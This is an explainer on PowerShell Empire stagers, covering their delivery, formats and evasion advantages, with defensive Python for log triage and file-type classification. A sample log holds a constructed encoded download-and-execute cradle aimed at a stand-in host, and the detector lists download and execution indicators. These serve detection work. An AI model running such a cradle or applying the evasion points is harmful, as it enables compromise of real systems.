stagers
A stager in PowerShell Empire is a lightweight initial payload whose primary job is to retrieve and execute the full agent from the command and control (C2) server. It is the first stage of infection,
How It Works:
- The attacker generates a stager using a listener (e.g., HTTP, SMB, etc.)
- The stager is delivered to the target via:
  - Phishing email
  - Exploit payload
  - Manual execution
- Upon execution, the stager:
  - Establishes communication with the listener
  - Downloads and executes the full agent
- The agent then maintains persistence and allows post-exploitation commands
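Seen from the defender's side, the step where the stager reaches out and pulls the agent is usually visible in PowerShell script-block logging (Event ID 4104) as an encoded, hidden-window, download-and-execute command. The Python script below is an added example, not Empire's own code: it decodes `-EncodedCommand` arguments (base64 of UTF-16LE) and scores each entry against indicator patterns. The log entries, host names, timestamps and the `example.invalid` URL are constructed for this example, and the indicator list and alert threshold are assumptions a team would tune.

```python
"""Triage of PowerShell script-block log entries for stager-like launchers.

Added example, not PowerShell Empire's own code. Log entries, host names and
the example.invalid URL below are constructed for this example; the indicator
patterns and the alert threshold are assumptions a team would tune.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Traits a download-and-execute launcher tends to carry. PowerShell is
# case-insensitive, so every pattern is matched with re.IGNORECASE.
INDICATORS = {
    "invoke-expression": r"\bIEX\b|Invoke-Expression",
    "web-download": r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient",
    "hidden-window": r"-W(?:indowStyle)?\s+Hidden",
    "no-profile": r"-NoP(?:rofile)?\b",
    "base64-decode": r"FromBase64String",
}

# -enc / -EncodedCommand / -e carries base64 of a UTF-16LE script.
ENCODED_ARG = re.compile(r"-(?:enc|EncodedCommand|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    host: str
    decoded: Optional[str]
    indicators: List[str]
    score: int


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    match = ENCODED_ARG.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_script_block(text: str):
    """Decode any encoded command, then match indicators on raw + decoded text."""
    decoded = decode_encoded_command(text)
    haystack = text + "\n" + (decoded or "")
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, haystack, re.IGNORECASE)]
    return decoded, hits


def triage_log(log_text: str) -> List[Finding]:
    """Each line: '<timestamp> <host> <script text>' (constructed 4104-like shape)."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        _timestamp, host, script = parts
        decoded, hits = triage_script_block(script)
        # Threshold (assumption): two indicators, or any indicator hidden
        # inside an encoded command, is worth an analyst's look.
        if len(hits) >= 2 or (decoded and hits):
            findings.append(Finding(line_no, host, decoded, hits, len(hits)))
    return findings


def encode_command(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log: one admin command, one encoded download-and-execute
# launcher, one plain software download, one harmless encoded command.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/')"
SAMPLE_LOG = "\n".join([
    "2024-01-01T10:00:00Z ws01 Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "2024-01-01T10:00:05Z ws01 powershell -NoP -W Hidden -enc " + encode_command(SAMPLE_CRADLE),
    "2024-01-01T10:00:09Z ws02 Invoke-WebRequest https://updates.example.invalid/patch.msi -OutFile C:\\Temp\\patch.msi",
    "2024-01-01T10:00:12Z ws03 powershell -enc " + encode_command("Get-Date"),
])

if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f"line {f.line_no} host={f.host} score={f.score} {f.indicators}")
        print("  decoded:", f.decoded)
```

Only the second entry is surfaced: the plain `Invoke-WebRequest` download carries one indicator and no encoding, and the encoded `Get-Date` decodes to nothing suspicious. The design point is that matching must run over the decoded text as well as the raw line; a rule that only inspects the command line as logged never sees the cradle inside the base64.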
Why Use Stagers?
| Advantage | Description |
|---|---|
| 🎯 Minimal Size | Small and easy to deliver in phishing, macros, exploits, etc. |
| 🦾 Modular | Separates staging from full agent functionality |
| 🕵️ Stealthy | Can be obfuscated or encoded to evade antivirus/EDR |
| 🔌 Flexible Delivery | Available in multiple formats (PowerShell, VBA, DLL, EXE, etc.) |
Stager Formats
PowerShell Empire supports various stager types, including:
| Stager Type | Description |
|---|---|
| launcher | A simple PowerShell command used in phishing/macro |
| multi/launcher | Executes in multiple phases (good for AV evasion) |
| dll | Compiled dynamic link library |
| hta | HTML Application for browser-based delivery |
| macro | VBA macro for embedding in Office documents |
| macro_launcher | Combo of launcher and macro in one |
| war / jsp | Web app payloads for Java-based servers |
| exe | Executable file for direct execution |
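Because the same stager can arrive as a DLL, EXE, HTA, macro document or WAR/JSP, a defender's first question about a delivered file is what it actually is, regardless of its extension. The Python script below is an added example, not Empire's own code: it labels a file by content, walking the MZ/PE headers to separate DLL from EXE, opening zip containers to spot a `vbaProject.bin` member or `WEB-INF/web.xml`, and checking text for HTA, JSP and auto-run VBA markers. Every sample is constructed (minimal headers and stub members only), and the label names and marker lists are this example's assumptions.

```python
"""Content-based triage for the stager delivery formats listed above.

Added example, not PowerShell Empire's own code. Every sample below is
constructed (minimal headers only); labels and markers are this example's
assumptions, and real triage would add hashing, sandboxing and full parsing.
"""
import io
import struct
import zipfile

IMAGE_FILE_DLL = 0x2000  # PE FileHeader.Characteristics flag that marks a DLL


def classify_pe(data: bytes) -> str:
    """Walk MZ -> e_lfanew -> PE signature -> Characteristics to tell dll from exe."""
    if len(data) < 0x40:
        return "pe-truncated"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # FileHeader.Characteristics sits 22 bytes past the 4-byte "PE\0\0" signature.
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "pe-truncated"
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return "dll" if characteristics & IMAGE_FILE_DLL else "exe"


def classify_zip(data: bytes) -> str:
    """Office documents and WAR files are zips; look inside for the telltale member."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return "zip-unreadable"
    if any(name.endswith("vbaProject.bin") for name in names):
        return "office-macro"      # macro-enabled Office document
    if "WEB-INF/web.xml" in names:
        return "war"
    if "[Content_Types].xml" in names:
        return "office-document"   # OOXML without a VBA project
    return "zip"


def classify_artifact(data: bytes) -> str:
    """Coarse label for a delivered file, decided by content rather than extension."""
    if data[:2] == b"MZ":
        return classify_pe(data)
    if data[:2] == b"PK":
        return classify_zip(data)
    text = data.decode("utf-8", errors="ignore").lower()
    if "<hta:application" in text:
        return "hta"
    if "<%" in text and "%>" in text:
        return "jsp"
    if any(marker in text for marker in ("auto_open", "autoopen", "workbook_open", "document_open")):
        return "vba-macro-source"   # auto-run VBA event handler names
    return "unknown"


# ---- constructed samples -------------------------------------------------

def make_fake_pe(is_dll: bool) -> bytes:
    """Minimal MZ/PE header carrying only the fields classify_pe reads."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # EXECUTABLE_IMAGE | 32BIT_MACHINE, plus IMAGE_FILE_DLL for the DLL case
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, characteristics)
    return dos_header + b"PE\0\0" + file_header


def make_fake_docm() -> bytes:
    """In-memory OOXML container with a stub vbaProject.bin member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE magic only
    return buf.getvalue()


SAMPLES = {
    "dropper.dll": make_fake_pe(is_dll=True),
    "tool.exe": make_fake_pe(is_dll=False),
    "invoice.docm": make_fake_docm(),
    "update.hta": b"<html><head><hta:application id='app'/></head><body></body></html>",
    "index.jsp": b"<%@ page language=\"java\" %><% out.println(\"constructed sample\"); %>",
    "notes.txt": b"nothing to see here",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:14} -> {classify_artifact(blob)}")
```

The `<hta:application>` tag is a strong but not necessary marker: `mshta` will run any HTML it is handed, so an `.hta` extension on a file with script content deserves the same attention even without the tag. Likewise the macro check only catches OOXML containers; legacy `.doc`/`.xls` files are OLE compound documents and need an OLE parser, which this example leaves out.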